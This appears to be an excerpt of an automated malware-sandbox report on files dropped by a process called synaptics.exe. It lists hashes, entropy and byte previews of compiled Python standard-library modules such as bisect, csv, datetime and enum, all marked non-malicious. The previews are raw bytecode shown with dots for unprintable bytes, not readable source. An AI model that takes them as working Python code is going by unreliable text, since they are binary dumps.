                                                                                                                                                                                                            SHA1:CBA8F19581D70CDC6E3633C5B165AD2A0435A2AC
                                                                                                                                                                                                            SHA-256:46002862324D0541230EA7880A5788B25874BCBF838A9DC3D05DBEB46B055033
                                                                                                                                                                                                            SHA-512:F3879D4724B7059D90FD56534306B0DACFE5CB143CA7B46332890DAB916F846ABADDABC7E0DD236CA8AA62946F71AB50B84AC2C3F64F2BCEFF62361A193E5177
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sp...d.Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.z.d.d.l.T.W.n...e.y1......Y.n.w.e.Z.e.Z.d.S.).z.Bisection algorithms......N....keyc....................C....>...|.d.u.r.t.|.|.|.|...}.n.t.|.|.|...|.|.|.d...}.|...|.|.....d.S.).z.Insert item x in list a, and keep it sorted assuming a is sorted... If x is already in a, insert it to the right of the rightmost x... Optional args lo (default 0) and hi (default len(a)) bound the. slice of a to be searched.. Nr....)...bisect_right..insert....a..x..lo..hir......r.....5C:\Users\user\AppData\Local\xFSOj9El1Q\lib\bisect.py..insort_right....s............r....c....................C...s....|.d.k.r.t.d.....|.d.u.r.t.|...}.|.d.u.r1|.|.k.r/|.|...d...}.|.|.|...k.r'|.}.n.|.d...}.|.|.k.s.|.S.|.|.k.rN|.|...d...}.|.|.|.|.....k.rF|.}.n.|.d...}.|.|.k.s5|.S.).a....Return the index where to insert item x in list a, assuming a is sorted... The return value i is such that all e in a[:i
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10894
                                                                                                                                                                                                            Entropy (8bit):5.274354076763479
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:h6Eb2RLPRaQHzW6FVoDCGEUPIzSh/NHSN:uRLPRLpGPIzG/NyN
                                                                                                                                                                                                            MD5:DE6D25F1E1909368BCF696475970C71D
                                                                                                                                                                                                            SHA1:4ABD627BF28F2F65EC312AFA651233B7F53888BF
                                                                                                                                                                                                            SHA-256:C863B8F2C8CD4F608BA271BD69A97CA42ED155CBC74808B684CC2E36F592D771
                                                                                                                                                                                                            SHA-512:3EC8A80185459424FF6181CC98F8E38A2E0B136AC8B932BF518FAC89590CE5BE24F2D44EB5B23CD6352D53640B71B3AD423B4CC2314DE73FCCA8E26379B0EAAC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d./.......................@...s....d.Z.g.d...Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.....d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Interface to the libbzip2 compression library...This module provides a file interface, classes for incremental.(de)compression, and functions for one-shot (de)compression..)...BZ2File..BZ2Compressor..BZ2Decompressor..open..compress..decompressz%Nadeem Vawda <nadeem.vawda@gmail.com>.....).r....N).r....r..............c....................@...s....e.Z.d.Z.d.Z.d*d.d...d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d,d.d...Z.d,d.d...Z.d.d...Z.d,d.d...Z.d,d.d ..Z.d!d"..Z.d#d$..Z.e.j.f.d%d&..Z.d'd(..Z.d)S.)-r....a@...A file object providing transparent bzip2 (de)compression... A BZ2File can act as a wrapper for an existing file object, or refer. directly to a named file on disk... Note that BZ2File provides a *binary* file interface - data read is. returned as bytes, and data t
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26327
                                                                                                                                                                                                            Entropy (8bit):5.232285193526222
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:jPfNsz3TQClly8bR9PS2qYRhWmBM2A9M/PNKGH:jdmHS2qgw29KGH
                                                                                                                                                                                                            MD5:C583F9B35B140A6498A27BF5436FBDEB
                                                                                                                                                                                                            SHA1:3A347C1AB150BEDB47EE61110732767A51E2BBC0
                                                                                                                                                                                                            SHA-256:8EBD3A68AFC54643ADAE8019937661320D347476416CD65C6110EDCBFAD53F5C
                                                                                                                                                                                                            SHA-512:6E4D7451741C8FCE88D0C03E491A35A71B1B93BA228D822403C7BD5B6B882D1424D1DF8F066A19ADED4E77A0FF1276C0CA2A5154CA76E2C892B9A692DBC514A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.b.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.g.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...\.Z.Z.Z.Z.Z.Z.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d ..Z"d!d"..Z#G.d#d$..d$e$..Z%G.d%d&..d&e%..Z&G.d'd(..d(e%..Z'G.d)d*..d*..Z(G.d+d,..d,e&..Z)G.d-d...d.e'..Z*e&..Z+e+j,Z-d/d0..Z.e+j/Z0e+j1Z1e+j2Z3e+j4Z5e+j6Z6e+j7Z8e+j9Z:e+j;Z<d1Z=d2Z>e=e>f.d3d4..Z?e=e>f.d5d6..Z@d7ZAe..BeAd.d....C..ZDd8d9..ZEd:d;..ZFeGd<k.r.eFe.jH....d.S.d.S.)=a$...Calendar printing functions..Note when comparing these calendars to the ones printed by cal(1): By.default, these calendars have Monday as the first day of the week, and.Sunday as the last (the European convention). Use setfirstweekday() to.set the first day of the week (0=Monday, 6=Sunday)......N)...repeat)...IllegalMonthError..IllegalWeekdayError..setfirstweekday..firstweekday..isleap..leapdays..weekday..monthrange..monthcalendar..prmonth..m
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33243
                                                                                                                                                                                                            Entropy (8bit):5.022647650916181
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:2//o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:2RUkFrOZwENNflPKPBxKa
                                                                                                                                                                                                            MD5:00A359F12E85B5D39BD24216B4340233
                                                                                                                                                                                                            SHA1:ADEFA1ADF4B6DFA57776FE9C65EE430F10FCEFC0
                                                                                                                                                                                                            SHA-256:F51AC88BD45428531C7726DCC410DCE018FDDF9F4287900CD55829FFC85830CD
                                                                                                                                                                                                            SHA-512:84813755EDF1A104C5CC542A25C053E88E75DD022E0549FE544DDD0993AD90F5414E0135C5F4193BA687D49BF7F226EC79B1375268D8E790812EA84149EADEA8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20919
                                                                                                                                                                                                            Entropy (8bit):5.0846250491331375
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ArNHbNxImphzxb/Dqd89tiVqnWcxavd5VCqXfNnpJ:mNHbNxhzpqd2OqnWvQAFf
                                                                                                                                                                                                            MD5:EE39B4BF3864DC091AB9338A0402CF9C
                                                                                                                                                                                                            SHA1:4585569C9E955A238C66144C72071DCF2122646E
                                                                                                                                                                                                            SHA-256:989C8BF2E3312C5AA61EAF7983C43234140925D8B60919416A7B649DA534FF0A
                                                                                                                                                                                                            SHA-512:1525DFAF12D7BACA8F6BB61A91407A8AE5EA6A885C868586423A63A19B7D75FC1D54868EB1D6A82B31AD8E6CB049FBD4DB0D49F43756B02B42649EB615D34D72
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.h.......................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e.e.e...Z.G.d.d...d.e.e.e...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&..Z.G.d'd(..d(e.e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z d.S.)-z4Utilities for with-statement contexts. See PEP 343......N)...deque....wraps)...MethodType..GenericAlias)...asynccontextmanager..contextmanager..closing..nullcontext..AbstractContextManager..AbstractAsyncContextManager..AsyncExitStack..ContextDecorator..ExitStack..redirect_stdout..redirect_stderr..suppress..aclosingc....................@....:...e.Z.d.Z.d.Z.e.e...Z.d.d...Z.e.j.d.d.....Z.e.d.d.....Z.d.S.).r....z,An abstract base class for context managers.c....................C........|.S...z0Return `self` upon entering the runtime context.......selfr....r.....9C:
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7020
                                                                                                                                                                                                            Entropy (8bit):5.422704393572908
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:WxPakDZxS5GFVc3isTDOuyib91quyccWEQTidqf2hMQkNv4n5q:0a0/S5GncR/Iib9wEREkidQ2Ov4k
                                                                                                                                                                                                            MD5:0770017CDFA595D33FF04100C48B4DC3
                                                                                                                                                                                                            SHA1:2DD87295FDB9F5886EC247AA5E206A7129C1C770
                                                                                                                                                                                                            SHA-256:9DE1959CDA2A7D73FC5D73598CA28991F40E16F7F378E5157006629C3CAB3B27
                                                                                                                                                                                                            SHA-512:0A69D8B84FB8A3035C33D5800D7B3E3865F6361A1FB62BB1BAF26A4B4F6E429D25FE115791C74DE43BC4AEEE026B7E592950BC53E7B67EEA7DE2E94A6EE9EC9A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.#.......................@...sV...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.e.Z.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.g.d...Z.d.d...Z.i...Z.Z.d.d...Z.e.d...e.e.e.e.e.e.e.e.e.e.e.e.e.j.e.e...e.e...e.j.e.j f.D.].Z!e.e.e!<.q[e"e.d.d...Z!e!d.u.rpe.e.e!<.e#j.e.e#<.e$j.e.e$<.e%j.e.e%<.e&j.e.e&<.e.d.u.r.e.j.e.e.<.[.[!d.g.f.d.d...Z'i...Z(Z.d.d...Z)e)e.e.d...<.e)e.e.e...<.e)e.e.e...<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.j*<.e)e.e.<.e)e.e.<.e)e.e.j.<.e)e.e.j.<.e)e.e.j <.e)e.e.<.e'f.d.d...Z+e+e.e#<.e'f.d.d...Z,e,e.e.<.e'f.d.d...Z-e-e.e$<.e.d.u...r.e-e.e.<.d.d...Z.e.e.e.j/<.[.d.d...Z0..d.e'd...d.d...Z1[.[.[.d.S.).a....Generic (shallow and deep) copying operations...Interface summary:.. import copy.. x = copy.copy(y) # make a shallow copy of y. x = copy.deepcopy(y) # make a deep copy of y..For module specific errors, copy.Error is raised...The difference between shallow and deep copying is only relevant for.compound objects (object
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4707
                                                                                                                                                                                                            Entropy (8bit):5.306559259791873
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:cCI7QMLHGjZ79X1XBrxbbJz0uqhUaCWfqmb5p2LYHjmTrhqH3TpYXGP2:evHGZBrpb56eWfhqLYHjmTkH3TpY2P2
                                                                                                                                                                                                            MD5:2CE04B95F453B92F3588B375637EB6D3
                                                                                                                                                                                                            SHA1:D17A546BA952DC96354BACA7CFDF97CB1FAC1904
                                                                                                                                                                                                            SHA-256:A28D9335328383F1C554528293F45B454E363ADF6E2CAF8C9E1176741E85963E
                                                                                                                                                                                                            SHA-512:5943EFB85F3DDA856E02C675D530253CEB764522D324914D5B70352E1440440D295C1E472AA9911B6F242657ACE7115731240AA575ED517850BAD45C858FB200
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.g.d...Z.i.Z.d.d.d...Z.d.d...Z.z.e...W.n...e.y.......Y.n.w.d.d...Z.e.e.e.e.....d.d...Z.e.e.e.e.B...e.....d.d...Z.d.Z.e.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.i.Z.i.Z.i.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.Helper to provide extensibility for pickle...This is only useful to add pickle support for extension types defined in.C, not for instances of user-defined classes..)...pickle..constructor..add_extension..remove_extension..clear_extension_cacheNc....................C...s0...t.|...s.t.d.....|.t.|.<.|.d.u.r.t.|.....d.S.d.S.).Nz$reduction functions must be callable)...callable..TypeError..dispatch_tabler....).Z.ob_typeZ.pickle_functionZ.constructor_ob..r.....6C:\Users\user\AppData\Local\xFSOj9El1Q\lib\copyreg.pyr........s................r....c....................C...s....t.|...s.t.d.....d.S.).Nz.constructors must be callable).r....r....)...objectr....r....r....r........s..........r....c....................C...s....t.|.j.|.j.f.f.S...N)...comp
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11822
                                                                                                                                                                                                            Entropy (8bit):5.447210751768081
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TJq1+BK5hSIQIWWvBMKumwKZdlXiWQA3LYPqOW9PJFoKzckOMsj9XCCDH:TJqrLSIQ2OKuuZrXiWQA0shzJaYWH
                                                                                                                                                                                                            MD5:AB772A6D5FF2ABDCA4C94E9640FD6F75
                                                                                                                                                                                                            SHA1:3C4EE25EF3372012AC50C18D412328B790C7A161
                                                                                                                                                                                                            SHA-256:2AEA7F1BC3670E7B07CE23C3A8E118F7443F82C58339B852DBBF457E9D8F9366
                                                                                                                                                                                                            SHA-512:BE678BA52D9F4EBDE54926E8848C74F09DB9C7BFABC0C040C047D4E8627AA9C1FE3E0192B234E729391A762845D520D13DFBEC36182F1AC9571886BB2B7AEF17
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dZ@.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d...Z.G.d.d...d...Z.z.e...W.n...e.y.......e.Z.Y.n.w.G.d.d...d...Z.d.S.).z+.csv.py - read/write/investigate CSV files......N)...Error..__version__..writer..reader..register_dialect..unregister_dialect..get_dialect..list_dialects..field_size_limit..QUOTE_MINIMAL..QUOTE_ALL..QUOTE_NONNUMERIC..QUOTE_NONE..__doc__)...Dialect)...StringIO).r....r....r....r....r....r....r......excel..excel_tabr....r....r....r....r....r......Snifferr....r......DictReader..DictWriter..unix_dialectc....................@...sD...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....z.Describe a CSV dialect... This must be subclassed (see csv.excel). Valid attributes are:. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):56557
                                                                                                                                                                                                            Entropy (8bit):5.250163097473247
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:EoPudGbiwEyaNVxLZnkM238oZMpA635Kw9uUFoYH:EWc1LMP0
                                                                                                                                                                                                            MD5:1BA31A29B8174B415F86995A3BD857BE
                                                                                                                                                                                                            SHA1:49D04EB383F3FDDD0A795C30CA7AC58DBCE13865
                                                                                                                                                                                                            SHA-256:35F475FEE7CB964FB440FB46887BC42145FAC9EF7CF91F8A4509350A59414758
                                                                                                                                                                                                            SHA-512:B55BCA8AAE3A788907ACB3417D73D7D46E02A3F460B2FF330775825FB4764B7C39599CE22B0C9EF116C81BB24713F10F4975E92E9F52BE226C183841BA7A5219
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.a.......................@...sr...d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.Z.d.Z.d.Z.g.d...Z.d.g.Z.d.Z.e.d.d.....D.].Z.e...e.....e.e.7.Z.q/[.[.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d.k.scJ...e.d.e...d...k.smJ...e.d.e...d...k.swJ...d.d...Z.g.d...Z.g.d...Z.d d!..Z.d\d#d$..Z.d%d&..Z d'd(..Z!d)d*..Z"d+d,..Z#d-d...Z$d/d0..Z%d1d2..Z&d3d4..Z'd5d6..Z(d7d8..Z)d9d:..Z*d;d<..Z+G.d=d>..d>..Z,e,d?..e,_-e,d@dAdBdBdCdD..e,_.e,d.dE..e,_/G.dFdG..dG..Z0e0Z1e0d.d.d...e0_-e0d.dHdI..e0_.e,d.dJ..e0_/G.dKdL..dL..Z2G.dMdN..dNe3..Z4e4Z5[4e2Z6G.dOdP..dP..Z.e.Z7e.d.d.d...e._-e.dAdBdBdC..e._.e,d.dE..e._/G.dQdR..dRe0..Z8e8d.d.d...e8_-e8d.dHdIdAdBdBdC..e8_.e,d.dE..e8_/dSdT..Z9G.dUdV..dVe2..Z:e:.;e,d.....e:_<e:.;e,dAdBdW......e:_-e:.;e,dAdBdW....e:_.e8dXd.d.e:j<dY..Z=z.d.dZl>T.W.n...e?..y.......Y.d.S.w.[.[.[.[.[.[.[=[.[.[.['[([)[%[&[.[*[1[.[.[.[.[ [.[.[9[.[.[.[7[6[![.[+["[$[#[5d.d[l>m.Z...d.S.)]z.Concrete date/time and related types...See http://www.iana.org/time-
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15680
                                                                                                                                                                                                            Entropy (8bit):5.468207195328533
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:1DdWn2oDAV888oUZ7tDzEMDfdF6ZSdDz0TxkxVGdAZiVxiEa+0:1DdtoM9UfD6ZBkrYAZiVkEa+0
                                                                                                                                                                                                            MD5:535824047BB2A7E489F63938FD9B28EC
                                                                                                                                                                                                            SHA1:6929ED82F7E2E97E5E8D3C1346CC4C0ABED02455
                                                                                                                                                                                                            SHA-256:28B29480ED144C402AA914FA8D4AE28A2125B8BE8B8A0BACB1498BF6010A3432
                                                                                                                                                                                                            SHA-512:A14C78CBF15EEC67EB3FE1376B73551F649703CF258CEA6DA7D4D38187B80D7968A31DE84EC476C9588E62F819BF6D09EE8B8AA645CE98AADE3303CE9058AF5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dPP.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...g.d...e...Z.[.e.j.e.j.e.j.e.e.e.f.Z.e.d...Z.d.e.d.f.e.d.f.e.d.f.f.Z.e.d...Z.d.Z.d.d...Z.dVd.d.d...d.d...Z.dVd.d...d.d...Z.d.d.d.d.d.d.d.d.d.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d.d...d(d)..Z.e.. d*d+..Z!d,e!j"_.d-e!j._.d.e!j#_.d/e!j$_.d0e!j%_.d1e!j&_.d2e!j'_.d3e!j(_.d4Z)d5Z*G.d6d7..d7e!..Z+d.d8..d9d:..Z,d;d<..Z-d=d>..Z.....dWd?d@..Z/dXd.d...dBdC..Z0d.d.d...dDdE..Z1....dYd.d.dF..dGdH..Z2dIdJ..Z3e0Z4dKdL..Z5dMdN..Z6dOdP..Z7G.dQdR..dR..Z8dSdT..Z9e:dUk...r.e9....d.S.d.S.)Zz0Disassembler of Python byte code into mnemonics......N)...*)...__all__)...code_info..dis..disassemble..distb..disco..findlinestarts..findlabels..show_code..get_instructions..Instruction..Bytecode..FORMAT_VALUE).N....str..repr..ascii..MAKE_FUNCTION)...defaults..kwdefaults..annotationsZ.closurec....................C...s4...z.t.|.|.d...}.W.|.S...t.y.......t.|.|.d...}.Y.|.S.w.).z.Attempts to compile the given source, fir
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26087
                                                                                                                                                                                                            Entropy (8bit):5.286437044537181
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:zFTKcmNJ6I61HjkGoQEARW5nV3j412nrp+6s8LY4F8AGK/h3Ec:zhGNJgJEARW3Ea+VZ4F8AGK/Wc
                                                                                                                                                                                                            MD5:BC8620729B7B02A6C84F48F32DDECEF8
                                                                                                                                                                                                            SHA1:D10DFFE988D97D6D294E661AA950E2104874BC22
                                                                                                                                                                                                            SHA-256:A67119A24241A06065C12C987B3EF5857177A77BE2AB25C5401497736D136AD8
                                                                                                                                                                                                            SHA-512:E5FCE9A23136327B8E13140D369747CBF835D63BCE808731B10F4E8FC5C8F49CE0AA1FB479CECD8FC2BFF55F3A7C7EB36E4B4824B8429545EC1EB2986430D601
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e.e...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.S.)%.....N)...MappingProxyType..DynamicClassAttribute)...EnumMeta..Enum..IntEnum..Flag..IntFlag..auto..uniquec....................C...s....t.|.d...p.t.|.d...p.t.|.d...S.).z?. Returns True if obj is a descriptor, False otherwise.. ..__get__..__set__..__delete__)...hasattr)...obj..r.....3C:\Users\user\AppData\Local\xFSOj9El1Q\lib\enum.py.._is_descriptor....s..............r....c....................C...sL...t.|...d.k.o%|.d.d.....|.d.d.........k.o.d.k.n.....o%|.d...d.k.o%|.d...d.k.S.).z=. Returns True if a __dunder__ name, False otherwise.. .....N..........Z.__.._.........len....namer....r....r......_is_dunder....s......&...........r....c....................C...sL...t.|...d.k.o%|.d...|.d.......k.o.d.k.n..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4268
                                                                                                                                                                                                            Entropy (8bit):5.669331829509546
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:KZ1NvFl7gPHnZns99V7Ry+/63Tq7Y1qYmWVzHRJwZLaL1iCtiOy9:K1vFl7g/ZnsV7g7HzTRbdUV
                                                                                                                                                                                                            MD5:D5C6C471A0DCB4A121CA930D60F31DA9
                                                                                                                                                                                                            SHA1:DE09AD750348CB01BDAF434787EF1EF96BB4BA50
                                                                                                                                                                                                            SHA-256:34B2A8A6826BC432BE91F10A3B79876F47D151F7C5BE98E10515913F6CC41C27
                                                                                                                                                                                                            SHA-512:D4CC724923E6936C1BD05623C2461ADB900B56973E30C9293DC3547865A5AB3292A3232A6D7B5ED4EE3D46169523BEEA565F8F148D1B40585E40A105B68A74D3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s|...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.l.m.Z...e...j.Z.[.d.d...Z.e.j.d.d.d...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).a....Filename matching with shell patterns...fnmatch(FILENAME, PATTERN) matches according to the local convention..fnmatchcase(FILENAME, PATTERN) always takes case in account...The functions operate by translating the pattern into a regular.expression. They cache the compiled regular expressions for speed...The function translate(PATTERN) returns a regular expression.corresponding to PATTERN. (It does not compile it.)......N)...filter..fnmatch..fnmatchcase..translate)...countc....................C...s"...t.j...|...}.t.j...|...}.t.|.|...S.).a....Test whether FILENAME matches PATTERN... Patterns are Unix shell style:.. * matches everything. ? matches any single character. [seq] matches any character in seq. [!seq] matches any char not in seq.. An initial period in FILENAME is not spec
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28359
                                                                                                                                                                                                            Entropy (8bit):5.3474043970917835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:loO3KwgQNi3/sZoyIw/kj6N4V9xI8HkXRssPmCzCe/:lo1pQNi30Cj6iV9hHkhsm7me/
                                                                                                                                                                                                            MD5:AEDECF4F366A55D9199AA2B61FD20098
                                                                                                                                                                                                            SHA1:B1B9C57903DE66C1101571F3825683EB9D916DB4
                                                                                                                                                                                                            SHA-256:DEEBF89238F36ECD5AE86D3951571963DB472EA9DD265EFDD0515960027440CC
                                                                                                                                                                                                            SHA-512:2AD41730B542719F1AD43FD866BC2854EBFF8A06143FA10CCB5EC1F5E0FAC9679115E5A9619C427D6A5D9FD581C6021D0E52A010DEE9213D4AC60F987FE4FB35
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
